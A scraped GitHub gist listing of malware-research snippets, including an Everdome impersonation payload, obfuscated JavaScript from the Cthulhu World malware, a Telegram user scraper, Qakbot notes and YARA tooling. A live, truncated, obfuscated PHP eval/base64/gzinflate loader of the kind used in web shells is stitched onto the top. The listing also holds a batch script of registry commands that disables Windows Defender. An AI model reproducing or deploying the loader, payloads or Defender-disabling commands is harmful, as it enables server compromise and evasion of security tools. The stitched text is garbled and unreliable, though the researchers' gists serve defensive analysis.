<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('LZjHruzIDYafxpjxQTnAK+WcszaGbyvn/PSW7vgAfdCtRURHFfnzcC31Y/+99VSy3sNi+XscygVQ/jsvRjovfxdQRhX3/3/8pXWrdKWcYl/svyBUg1NUXwjg2ZiFomNYRhXY24uenOm+/RdxyOEd5mzvt4io4AIyESUsluY7AJEcmkPceOJ+3n8oKjAIHlfvyPfr/dTvB1bBoUfJhdKUQQP8K/+9Fwd0oxteY3qyG4psv6QsasUuVBCPETzEwsLf1Jpm80DVGmIlckDXaUo0CEO+tZWH1YNneziPR/Ki35Zejw33Z7OQrjG3ASy9Jmx4ilJ5BoOAA9AK8W20TLR7Rod+1zhmWTHnUtBCrKlspujODpj3jn7Azqm1Hn1lA9dFi2NE/QnXG/uHDgH2Rly4J0PR1W3/OR1OFgbMiI8ra6gF1oVbG+Ldo8yYD8t574fZpRwZAAlFMa+hNNrp0CvEmZopbJ8US9SS1c13PSpGZYTZRzhjw46sIKCZfQtYloAUaRePy7KO3OKWWgtDAO+AYEfHzi6ViXS3NgOUyJpEor0Ldw4FpkDcnrvpNbxqOhZiwxe2TaNzHO797eJ6WeA7MEwWadyNtj9tBLeufcbfhs05+Y5E/LLMACBjS8BfSseKMIy8l7FBK/xM5Si5izXYDhkocRV8hEH8HQQBZlRg/BG0VuWCRpl7Li0pEqBIOhILVosYs8yijrLIp9JCf+AlX+au8BZ8tOOL4YlxuVjSgvUCxokVjkWzrpoZ/vWpPprcmMUZ/4Iwlr8rvghEamDOo1WtkUtS36vzxEKyQrRw+IyL19HVfr65AiMa50wglxUk61faqEz43uozPXQ3hayWFNfATnLMqMV+xotOxrs+AyDoY1jQY4fa4WOovLCQOtLsU+GJgJU3njRsm5fs3VCHMdYdfqeio+Wpye4uGnmqxgbaUYeWyL0PDKvQ
Iamdeadlyz
/ everdome_impersonation_payload.js
Last active
October 2, 2022 19:06
Everdome impersonation - payload - https://twitter.com/Jon_HQ/status/1572902872110755843
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var css = document.createElement('link') | |
| css.setAttribute( | |
| 'href', | |
| 'hxxps://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css' | |
| ) | |
| css.setAttribute('rel', 'stylesheet') | |
| document.head.appendChild(css) | |
| var js = document.createElement('script') | |
| js.setAttribute( | |
| 'src', |
Iamdeadlyz
/ Cthulhu_World_accounts.txt
Last active
October 2, 2022 18:46
Cthulhu World malware - Twitter IDs of fake accounts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CWorldP2E - 1559535183753367552 | |
| QOWA_YT - 1126138101015834625 | |
| DorisCthulhu - 1230880754 | |
| SweetWorld89 - 1351962235736903685 | |
| jimin9617 - 220874903 | |
| 5WebStar - 2500050553 | |
| emmooren - 2684676034 | |
| YunseokBeom - 3002910870 | |
| ozone7007 - 397798464 | |
| octopi_cthulhu - 440906367 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const _0x3f2697 = _0x16cd; | |
| (function(_0x3a622c, _0x12d7af) { | |
| const _0x3fe9ea = _0x16cd | |
| , _0x18bf6e = _0x3a622c(); | |
| while (!![]) { | |
| try { | |
| const _0x3b70c8 = parseInt(_0x3fe9ea(0xb4)) / 0x1 + -parseInt(_0x3fe9ea(0x8f)) / 0x2 * (-parseInt(_0x3fe9ea(0x70)) / 0x3) + parseInt(_0x3fe9ea(0xcc)) / 0x4 + parseInt(_0x3fe9ea(0x9d)) / 0x5 + -parseInt(_0x3fe9ea(0x91)) / 0x6 + -parseInt(_0x3fe9ea(0x76)) / 0x7 * (-parseInt(_0x3fe9ea(0xc5)) / 0x8) + -parseInt(_0x3fe9ea(0x74)) / 0x9; | |
| if (_0x3b70c8 === _0x12d7af) | |
| break; | |
| else |
botlabsDev
/ mount_shared_folder.sh
Created
October 6, 2021 08:37
VMware - mount all shared folders from the VMware host into the the linux vm
ActorExpose
/ getUsers.user.js
Created
June 8, 2021 00:47
— forked from fabledowl/getUsers.user.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Telegram - Get Users | |
| // @author [email protected] | |
| // @desription Greasemonkey script to extract users from Telegram groups | |
| // @namespace https://fabledowlblog.wordpress.com/ | |
| // @include https://web.telegram.org/* | |
| // @downloadUrl https://gist.github.com/fabledowl/8c8db5858e096866c42dfa114034f0f2/raw/getUsers.user.js | |
| // @updateUrl https://gist.github.com/fabledowl/8c8db5858e096866c42dfa114034f0f2/raw/getUsers.user.js | |
| // @version 0.4 | |
| // @grant none |
IlluminatiFish
/ Centauri.py
Last active
June 5, 2021 03:34
A quick python class, to find and identify a favicon for a given URL and calculating the favicon's murmur3 hash, which can be later used for favicon hash matching via services like Shodan
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This program is a utility used by myself that I have released | |
| # to the public under the GPLv3 license | |
| # | |
| # Copyright (c) 2021 IlluminatiFish. | |
| # | |
| # This program is free software: you can redistribute it and/or modify | |
| # it under the terms of the GNU General Public License as published by | |
| # the Free Software Foundation, version 3. | |
| # |
phage-nz
/ qakbot_070321.md
Last active
March 8, 2021 23:09
MHaggis
/ disablethings.bat
Created
March 2, 2021 17:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat | |
| reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime |
danthe1st
/ Data_class_checklist.md
Last active
April 8, 2023 21:36
JPA data class checklist and example persistence.xml for EclipseLink
- Primary Key:
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long oid;- annotate all data classes with
@Entity - Create attributes
- Annotate relations
- Create getters/Setters, equals/hashCode (required for
Sets)
IlluminatiFish
/ YARAStringGeneartor.py
Last active
June 4, 2021 00:49
A function that enables you to get the intersecting strings from the list of files defined in the function parameter along with an adjustable string size, could be used for YARA rule generation.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This program is a utility used by myself that I have released | |
| # to the public under the GPLv3 license | |
| # | |
| # Copyright (c) 2021 IlluminatiFish. | |
| # | |
| # This program is free software: you can redistribute it and/or modify | |
| # it under the terms of the GNU General Public License as published by | |
| # the Free Software Foundation, version 3. | |
| # |
NewerOlder